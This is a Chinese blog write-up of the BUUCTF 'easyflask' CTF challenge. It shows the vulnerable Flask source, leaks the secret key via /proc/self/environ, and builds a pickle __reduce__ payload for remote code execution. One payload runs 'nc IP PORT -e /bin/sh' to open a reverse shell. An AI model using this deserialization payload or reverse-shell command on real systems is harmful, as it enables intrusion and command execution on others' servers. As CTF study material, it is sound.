buuctf--easyflask

最新推荐文章于 2024-07-30 17:23:09 发布
最新推荐文章于 2024-07-30 17:23:09 发布
阅读量879 收藏
点赞数
文章标签: flask python 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46263951/article/details/122246047
版权

根据提示访问/file?file=index.js,可以看到提示源码在/app/source


#!/usr/bin/python3.6
import os
import pickle

from base64 import b64decode
from flask import Flask, request, render_template, session

app = Flask(__name__)
app.config["SECRET_KEY"] = "*******"

User = type('User', (object,), {
    'uname': 'test',
    'is_admin': 0,
    '__repr__': lambda o: o.uname,
})


@app.route('/', methods=('GET',))
def index_handler():
    if not session.get('u'):
        u = pickle.dumps(User())
        session['u'] = u
    return "/file?file=index.js"


@app.route('/file', methods=('GET',))
def file_handler():
    path = request.args.get('file')
    path = os.path.join('static', path)
    if not os.path.exists(path) or os.path.isdir(path) \
            or '.py' in path or '.sh' in path or '..' in path or "flag" in path:
        return 'disallowed'

    with open(path, 'r') as fp:
        content = fp.read()
    return content


@app.route('/admin', methods=('GET',))
def admin_handler():
    try:
        u = session.get('u')
        if isinstance(u, dict):
            u = b64decode(u.get('b'))
        u = pickle.loads(u)
    except Exception:
        return 'uhh?'

    if u.is_admin == 1:
        return 'welcome, admin'
    else:
        return 'who are you?'


if __name__ == '__main__':
    app.run('0.0.0.0', port=80, debug=False)

通过审计代码可以发现这个题的考点是session伪造+pickle反序列化
首先伪造session就需要secret_key,这里可以通过访问/proc/self/environ 获取环境变量

/proc是一种伪文件系统(也即虚拟文件系统),存储的是当前内核运行状态的一系列特殊文件,
用户可以通过这些文件查看有关系统硬件及当前正在运行进程的信息,甚至可以通过更改其中某些文件来改变内核的运行状态。
 
environ是 — 当前进程的环境变量列表,self可以替换成进程号。

glzjin22948575858jfjfjufirijidjitg3uiiuuh

这里利用Pickle中的__reduce__魔术方法

import pickle
from base64 import b64encode

User = type('User', (object,), {
    'uname': 'test',
    'is_admin': 1,
    '__repr__': lambda o: o.uname,
    '__reduce__': lambda o: (eval, ("__import__('os').system('nc IP PORT -e /bin/sh')",))

})

class User(object):
    def __reduce__(self):
        import os
        cmd = "cat /flag > /tmp/test1"
        return (os.system, (cmd,))

u = pickle.dumps(User())
print(b64encode(u).decode())

session伪造

访问/admin即可

参考文章:

https://xz.aliyun.com/t/7436#toc-0   pickle反序列化初探

从零开始python反序列化攻击:pickle原理解析 & 不用reduce的RCE姿势 - 知乎

​​​​​​​[HFCTF 2021 Final]easyflask_Arnoldqqq的博客-CSDN博客

Uzero.
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BUUCTF--Reverse
weixin_48295646的博客
05-21 1992
easyre 用notepad++打开文件,直接用搜索就搜索出来flag{this_Is_a_EaSyRe} reverse1 reverse1 注意:得到的 flag 请包上 flag{} 提交
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
buuctf-qr1
2301_79968824的博客
11-06 77
3.用一下查看二维码的工具QR Research看一下。1.在buuctf上找到题目,下载。4.真的没想到已经出来了,直接填吧。2.解压打开是一个二维码。
BUUCTF---misc---菜刀666
2201_75556700的博客
05-04 627
7、将z2后面的十六进制保存在新建的txt文件中,用010编辑器导入十六进制即txt,后保存为jpg,得到照片。8、接着将流量包分离出压缩包,得到一个flag.txt,需要密码。5、追踪http数据流,发现z2后面是一个jpg文件的文件头。2、题目说是菜刀,联想到http协议的post方法。1、下载附件,在wireshark中分析。6、往下滑,发现提示有txt文件和压缩包。9、使用照片中提示的密码,得到flag。4、打开数据包,发现有个不一样。这里面有一大串的数据包。
BUUCTF- 基础破解
个人做题记录,大佬勿喷
01-09 418
有大小写字母,数字,末尾有等号,base64,大家可以去搜搜看base家族的区别。题目提示,四位数字加密,直接爆破。
buuctf - crypto - MD5
yinan99977的博客
11-21 184
buuctf
BUUCTF-------九连环
woshicainiao666的博客
10-15 185
将jpg拉到kali中用steghide,这是一个隐写工具,可以从图片中提取图片中隐藏的数据。得到了asd文件夹,里面good.jpg和qwe.zip中的flag.txt都是加密的。说明文件数据有错误,想到是不是伪加密,将1.zip拉到win系统010editor中。1. 右键点击图片,发现有包含了flag.txt和其他文件。2.拉到kali中用binwork分离文件。拿到密码解开flag.txt。
buuctf--九连环】
ncnfjdjjd的博客
02-06 1033
steghide
BUUCTF-RSA4
qq_61774705的博客
05-10 1385
1.题目代码: # N = 331310324212000030020214312244232222400142410423413104441140203003243002104333214202031202212403400220031202142322434104143104244241214204444443323000244130122022422310201104411044030113302323014101331214303223312402430402404413033243132101
BUUCTF-qr
个人做题记录,大佬勿喷
01-09 396
二维码,直接QR开扫,直接出来了我丢。
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
【变量覆盖漏洞详解】 ...这类漏洞通常出现在以下几种情况: 1. **全局变量覆盖**: ...攻击者可以通过操纵这些请求参数来覆盖预定义的变量,造成安全风险。... ...2. **extract()函数使用不当**: `extract()`函数会从数组中...
BUUCTF-MISC-WP(详细解题思路)
01-27
BUUCTF-MISC-WP(详细解题思路)
BUUCTF Reverse CrackRTF-附件资源
03-05
BUUCTF Reverse CrackRTF-附件资源
LiteLLM
编码时光
07-25 1024
一、关于 LiteLLM🚅 企业级 我们为什么要建造这个? 二、用法 异步 流 日志可观测性 三、OpenAI代理 📖代理端点 快速启动代理-CLI 第1步:启动litellm代理 第2步:向代理发出ChatCompletions请求 代理密钥管理 请求 预期反应 四、支持的 Providers 五、贡献
Python】pandas:排序、重复值、缺省值处理、合并、分组
最新发布
yannan20190313的博客
07-30 498
Python】pandas:排序(sort_index,sort_values)、重复值(duplicated,drop_duplicates,value_counts,nunique)、缺省值处理(isna,isnull,notna,notnull,fillna,dropna,replace)、合并(join,merge,append,concat)、分组(groupby)
快醒醒,别睡了!...讲《数据分析pandas库》了—/—<4>
qq_64603703的博客
07-27 989
详细解说数据分析pandas库中的常用方法
全网最详细Gradio教程系列5——Gradio Client: python
shao918516的博客
07-26 1088
程序部署完成后,如何将Gradio App作为API访问使用呢,这就用到Gradio Client。本章讲解Gradio Client的三种使用方式:python、javascript和curl,受字数限制,所以分三篇博客发布。 使用Gradio Python Client非常易于将Gradio应用程序作为API使用,本节讲述gradio_client安装、如何连接Gradio应用程序、查看可用API及其使用方式、job及session等用法。 通过Gradio Python Cli
Selenium与WebDriver:Errno 8 Exec格式错误的多种解决方案
ip16yun的博客
07-30 265
在使用Selenium和WebDriver进行网页自动化时,可能会遇到各种错误。其中一个常见问题是执行格式错误(Errno 8 Exec format error)。这个错误通常在运行ChromeDriver时出现,错误提示涉及路径中的某个文件。本文将概述这个问题的背景,并提供多种解决方案,包括如何使用代理IP技术进行数据抓取。
buuctf-强网杯2019随便注
09-03
buuctf-强网杯2019随便注是一场2019年强网杯举办的CTF比赛中的一道题目。这道题目的名称暗示着它是一个与注入漏洞相关的题目。 注入漏洞是一种网络安全漏洞,攻击者可以通过在用户输入的数据中注入恶意代码来获取...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值